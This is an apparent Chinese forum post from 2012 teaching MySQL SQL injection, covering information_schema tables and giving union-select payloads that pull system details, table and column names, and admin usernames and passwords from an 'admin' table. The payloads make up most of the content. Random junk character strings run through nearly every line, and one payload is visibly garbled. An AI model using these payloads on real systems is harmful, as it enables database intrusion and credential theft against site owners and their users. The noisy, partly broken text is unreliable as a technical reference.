本文介绍MYSQL盲注的一些语句和方法 Y* a9 z- S( j# y& q
# O, h9 C0 _" D8 t
学习盲注前先了解下 IFORMATION_SCHEMA 库! @! Y" p" m2 ?0 z$ D8 ? |
4 W! ]5 h; j W2 G2 S5 U6 P
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
& \, r; t3 V4 \" Z1 v! H: G5 q存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。* `+ ]9 {/ r! H7 F9 b) W
1.得到所有数据库名:( b/ F* P" y A; I! [
|SCHEMATA ->存储数据库名的表* E+ y. }" a# d* A, B0 ^* l
|---字段:SCHEMA_NAME ->数据库名称6 C" m# `1 \3 i( Y$ m1 z# S
9 s6 @# T4 h6 A1 [|TABLES ->存储表名
+ a+ d# b$ ?( q& _& w+ j|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名" e) X8 P& ~5 b" {+ C
|---字段:TABLE_NAME ->存储表的表名
. }/ O5 z, n% P, T9 o+ F) i" H
+ M; o( s3 Z* h+ Z X8 b3 }|COLUMNS ->存储的字段名表3 W& t; M3 s8 F: q: r. A
|---字段:TABLE_SCHEMA ->该字段所属数据库名
* A5 S( {+ h( w1 K" \, u|---字段:TABLE_NAME ->存储所属表的名称
. j& o$ c, n5 p9 ^7 P5 h. F8 M' W' b ]8 S2 v
|---字段:COLUMN_NAME ->该字段的名称! y$ y& ]9 N) \) e) V
( G3 H" R* Q7 p4 [6 T \
3 ~5 A: q1 A/ c0 f7 ?3 T
/ `4 p! Z$ J0 P" I3 \6 d2 t% `! v###########################################################################, t5 t1 w% Q! `1 {/ @# n
; X) Q0 ^; n9 i# K* r
0x001 获取系统信息:
; X7 t; r! _# i N2 A1 X9 e1 f8 Z3 e8 a* ^& g4 a
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
; g T( ~( ^8 H9 K+ u
1 [- P8 N4 r7 \4 H/*
- ^+ V# O" v% B
. b6 }9 h! `" m# B@@global.version_compile_os 获取系统版本
( f% B* W0 m/ S T
" `# I: Y8 h! v@@datadir 数据库路径/ O6 Q! @8 S2 o4 h7 c
database() 当前数据库名称/ }5 b( b/ `6 R
0x3c62723e 换行HEX值4 t9 g3 A& P% v5 i: y, V6 z9 p
5 J; V# ^: i6 t. v% m8 d
*/8 a" K! K! X9 w' @8 b$ p! Z+ }
% i. j( q; q/ ]6 i" P* P( e
' G* P* J" n+ V1 D) I6 X8 J3 ~3 M9 _+ N: ^- K( _: c) n2 a
######################################################################
; W* L- j5 q& K0 C) o) A) y& c/ C$ i: o/ m
0x002 获取表名
2 ?$ d$ d* T" ^ }4 h6 d( B$ B/ I4 i* } u+ |: T0 b3 _$ V
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
1 c& B5 \5 j9 Y* n+ i* M. K6 _" s3 r2 A+ A
" G! w4 E" n+ i$ O% p3 m) Y
3 t& f4 ], P, `- i ~6 Y/*$ ^( |; w! e3 W6 G/ o3 \7 H
+ G" h7 I A6 p) L3 e0x67617264656e 为当前数据库名7 {8 O0 ?0 v0 E4 y6 B% l/ [
$ V0 ^; V0 s0 r& l$ A
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
$ c) }- B6 M( U1 Q8 S1 f6 J0 D: S( S3 {& P
*/: J# F( ]+ _$ d' k
; j9 P; J; z$ y( n, V: b######################################################################8 C1 f- X5 V! u
s0 {: q6 L9 D8 b $ P) B( `% w. y3 q
4 H0 J& a% ` U% p% F0x003 获取字段
8 e/ w! C/ L) i7 w
$ j0 W0 R) G: [5 h" L4 N2 p+ munion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
0 V, }6 G7 I# X1 W( x: \ t- [5 Q
& o( [/ a% |$ [9 M" y/*
+ n3 [' V+ V3 x- T
0 X y( j0 s9 }' Sgroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
$ ]- o" R, F9 p! @8 F5 z
0 L7 y3 j7 N3 L' X0x61646d696e ->选择一个表( I; j9 m5 P4 j- ^1 _! f
7 U5 B" s9 n; K& B6 F6 N
0x67617264656e ->数据库名
, q4 e3 z! y. a( ]4 p6 w C
2 T! V) z* ~( Z+ } [*/
& X H# X7 h# _ S, Q- j
/ o4 p3 v7 ^2 n2 C. X2 w' ^#####################################################################1 m- A$ u" W! d y
+ k2 H, C; |7 L% i# X* L. t7 r! d
& }$ s# C3 t) S! ]: g$ ]
% g( t# _! `3 ~& s" G0x004 获取数据
6 X! X- M( l! _5 h8 q6 B0 ?
; }# a8 ]% t$ A2 [& k: hunion select 1,2,3! t5 c) K! w5 N7 u- e5 G. a
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
}" a3 i# H ?2 L! N, t' W+ R1 p: ^' D3 x: C2 {, D9 L7 l
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin" y8 \/ T/ V O( r( z) u
( H$ [- I# L+ E) k% ~6 g0 m- i- n; w
8 F; U" `5 U) O: D( r) D. |, a6 o6 D! s/ T, f( {0 }4 t! y$ A
/*) `4 U* l& R' K% f& t& ^$ ]" t
2 d5 Y c( u. T% v4 O
0x3c62723e 换行符号HEX编码" f; t7 e, h; e4 r4 Q! \+ k( s0 c
) w- H7 L5 T6 ]( }, s2 ~3 Z. ~1 Xgroup_concat 同时获得该字段所有数据. X' s0 l o5 b( H% p- W8 A
7 z" x& T& Z! q& n) [. K
*/, d7 h$ X* Q3 ^- s
5 k# N5 V# P4 P+ s
|
发表于 2012-9-13 17:48:44
收藏
支持
反对